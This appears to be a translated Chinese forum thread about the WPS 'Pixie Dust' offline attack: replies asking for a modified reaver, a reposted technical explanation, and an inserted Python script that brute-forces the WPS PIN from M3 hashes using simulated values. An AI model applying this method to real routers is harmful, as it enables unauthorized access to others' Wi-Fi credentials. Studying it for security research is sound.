UBNT solutions
OP: iodata

WPS offline attack....


Posted on 2015-4-8 20:31
This post was last edited by iodata on 2015-4-8 20:34

.....................
Posted on 2015-4-8 20:49
iodata posted on 2015-4-8 20:31:
.....................

I had a quick look at the process; it seems I judged it wrong, so first of all, apologies to the OP.
Posted on 2015-4-8 21:11
Looks really impressive!!!!!
Posted on 2015-4-8 22:09 from mobile
Can't understand it…………
Posted on 2015-4-8 22:11 from mobile
Looks very high-end, ……
Posted on 2015-4-8 22:49
The modified reaver won't install...
Posted on 2015-4-9 03:08
Newbie here, asking the experts: how exactly is this tool used? Is there a tutorial?
Posted on 2015-4-9 03:10
Is it loaded and used in wifislax, or in Linux?
Posted on 2015-4-9 04:09
Hahahahahahahahahaha
Posted on 2015-4-9 08:10
OP, could you please send me a copy of the modified reaver? Thanks. 229791000@qq.com
Posted on 2015-4-9 08:43
curry33 posted on 2015-4-6 12:41:
http://usepremium.blinkweb.com/
Download it through a relay site

How do I download this?
It's gone, thread locked.........
Posted on 2015-4-9 09:45
This post was last edited by 13715168054 on 2015-4-9 10:02

WPS Pixie Dust Attack (Offline WPS Attack)

A Kali member, "Wiire", has released his tool "pixiewps"! It is available from Wiire's GitHub.

You can also download the modified version of reaver here.

Hello guys. I've been looking into the new WPS security flaw found by Dominique Bongard. None of the information I am providing here is mine; all credit goes to Bongard and the other sources listed at the bottom.

Here is a database of affected/non-affected models.

Background: Basically, Dominique Bongard discovered that Broadcom eCos chips use a Pseudo Random Number Generator that is not entirely random; that is, we can easily brute force the state of the PRNG to recover a bunch of data that the router generates and that is supposed to be secret. Ralink's implementation is even worse; however, I haven't looked into it much yet. So basically, if we can find the state of the PRNG that generated the nonce, we can find the WPS PIN in one single try. This effectively defeats AP rate-limiting tactics, AND everything can be done within a matter of seconds.

The first thing we have to do is modify reaver so that once we receive an M3 message, the attack stops. We also need to make sure that we, the client, are the Registrar, and the AP is the Enrollee.

The following information is known by all WPS-enabled devices:
- Pseudo Random Number Generator used to make the public keys (g^AB mod p)
- g is the generator, A and B are the private numbers of the Enrollee and Registrar respectively, and p is a prime modulus.


The following information is gathered from the M1 and M2 packets:
- N1: Enrollee Nonce
- PKR: Public Key (Registrar Nonce) (g^B mod p)
- PKE: Public Key (Enrollee Nonce) (g^A mod p)

The AuthKey is derived from the KDK.

The following information is gathered from the M3 packet:
- E-Hash1 = HMAC(E-S1, PSK1, PKE, PKR)
- E-Hash2 = HMAC(E-S2, PSK2, PKE, PKR)

Components: E-S1 and E-S2 are secret 128-bit nonces generated right after the router generates its N1 nonce. If we can brute force the state of the PRNG, then we can find out the E-S1 and E-S2 nonces.

PSK1 and PSK2 are derived from the first and second halves of the router's PIN. Many of you know that the router takes the 8-digit PIN and splits it in two, not to mention that the last digit of the second half is a checksum, so instead of 100,000,000 different PIN combinations, we only have 10,000 + 1,000 = 11,000 possible PINs to brute force.

HMAC is a function that hashes all the data in parentheses. The function is HMAC-SHA-256.

Conclusion:

So, assuming we already know PKE, PKR, E-S1 and E-S2 (since we just brute forced them), we can run all the data through and basically just try every PIN until we have a matching hash. When we get a match, we can say "OK, that last PIN we used matched the hash from the M3 packet. That must be the PIN." We do this for both PSK1 and PSK2, and with only 11,000 possibilities (20,000 if we don't want to calculate the checksum... it won't make a difference in time), it will take only a few seconds to compute everything. Now we can take the PIN we just brute forced and toss it into reaver, and the AP will say "OK, you have the right PIN, here are all my credentials," including the SSID, WPS PIN, and the WPA key.


If you find anything new or wish to correct me, please do so and post it in the comments! I will try to respond and keep you updated as frequently as possible!

Here are all of my sources:

- Dominique Bongard's Slide Presentation
- Dominique Bongard's Video Presentation
- Hack Forums Information
- Top Hat Sec Information
- Khan Academy: Diffie-Hellman Key Exchange
- Khan Academy: Pseudo Random Number Generator Explanation
- GitHub: Leaked Broadcom random.c Function
- WPS Background
- Complete WPS Specification (PDF Download)

And I would like to give a special thanks to DataHead, Wiire, FrostyHacks and of course Dominique Bongard for all their help! Thank You!
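The offline PIN recovery the post above describes, the step that runs after E-S1 and E-S2 have been pulled out of the AP's PRNG state, as an added example that is not part of the original post nor code from pixiewps or reaver. The formulas are the WPS ones (PSK halves, E-Hash1/E-Hash2, checksum digit). AuthKey, PKE, PKR, E-S1 and E-S2 are constructed constants standing in for what a Registrar would take from M1/M2 and from the PRNG-state brute force; `build_m3` plays the AP only so there are hashes to attack, and `TRUE_PIN` is made up.

```python
"""Offline WPS PIN recovery from the M3 hashes (the final Pixie Dust step).

Added example, not code from the post or from pixiewps/reaver. The formulas
are the WPS ones; all key material below is constructed with fixed seeds so
the script runs offline and deterministically.

    PSK1     = HMAC-SHA256(AuthKey, PIN[0:4])[:16]
    PSK2     = HMAC-SHA256(AuthKey, PIN[4:8])[:16]
    E-Hash1  = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR)
    E-Hash2  = HMAC-SHA256(AuthKey, E-S2 || PSK2 || PKE || PKR)
"""
import hashlib
import hmac

# --- Constructed inputs (assumptions, not captured values) ---------------
# AuthKey: the Registrar derives it from the DH shared secret and the nonces
# via the KDK; a fixed 32-byte stand-in is used here.
AUTHKEY = hashlib.sha256(b"example AuthKey").digest()
# PKE/PKR: 1536-bit DH public keys from M1/M2; 192 constructed bytes each.
PKE = hashlib.shake_256(b"example PKE").digest(192)
PKR = hashlib.shake_256(b"example PKR").digest(192)
# E-S1/E-S2: the Enrollee's secret 128-bit nonces. In the real attack they
# come from brute-forcing the AP's PRNG state; here they are simply given.
E_S1 = hashlib.sha256(b"example E-S1").digest()[:16]
E_S2 = hashlib.sha256(b"example E-S2").digest()[:16]
TRUE_PIN = "48691239"  # constructed; the last digit is a valid WPS checksum


def hmac256(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()


def wps_checksum_digit(first7: int) -> int:
    """Checksum (8th) digit of a WPS PIN from its first 7 digits:
    weights 3,1,3,1,3,1,3 starting at the most significant digit."""
    acc = 0
    for pos in range(7):
        digit = (first7 // 10 ** (6 - pos)) % 10
        acc += digit * (3 if pos % 2 == 0 else 1)
    return (10 - acc % 10) % 10


def psk_half(authkey: bytes, four_digits: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256 over the ASCII PIN half."""
    return hmac256(authkey, four_digits.encode("ascii"))[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 exactly as the Enrollee computes them for M3."""
    return hmac256(authkey, e_s + psk + pke + pkr)


def build_m3(pin: str, authkey: bytes, pke: bytes, pkr: bytes,
             e_s1: bytes, e_s2: bytes) -> tuple:
    """Stand-in for the AP: the two hashes it sends in M3."""
    return (e_hash(authkey, e_s1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, e_s2, psk_half(authkey, pin[4:]), pke, pkr))


def recover_pin(authkey, pke, pkr, e_s1, e_s2, e_hash1, e_hash2):
    """Offline brute force of the PIN from M3's hashes.

    First half: 10,000 candidates. Second half: 1,000 candidates, because
    the 8th digit is forced by the checksum. No further AP interaction is
    needed, so WPS lockout / rate limiting never triggers. Returns None if
    nothing matches, which usually means E-S1/E-S2 were not recovered
    correctly (or this AP's nonces are not predictable at all)."""
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if e_hash(authkey, e_s1, psk_half(authkey, half), pke, pkr) == e_hash1:
            first = half
            break
    if first is None:
        return None
    for j in range(1_000):
        half = f"{j:03d}{wps_checksum_digit(int(first) * 1000 + j)}"
        if e_hash(authkey, e_s2, psk_half(authkey, half), pke, pkr) == e_hash2:
            return first + half
    return None


def demo() -> str:
    """Simulate M3 from the AP, then recover the PIN offline."""
    e_hash1, e_hash2 = build_m3(TRUE_PIN, AUTHKEY, PKE, PKR, E_S1, E_S2)
    return recover_pin(AUTHKEY, PKE, PKR, E_S1, E_S2, e_hash1, e_hash2)


if __name__ == "__main__":
    print("recovered PIN:", demo())
```

Two things worth noticing when running it: the whole search is at most 11,000 HMAC pairs, so it finishes in well under a second even in Python, and a `None` result is the check a practitioner wants, since a wrong E-S1/E-S2 (the PRNG state was not really recovered) fails cleanly instead of producing a bogus PIN to feed back into reaver.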

无线门户 (粤ICP备11076993号 | 粤公网安备44010602008359号)

GMT+8, 2024-9-21 12:27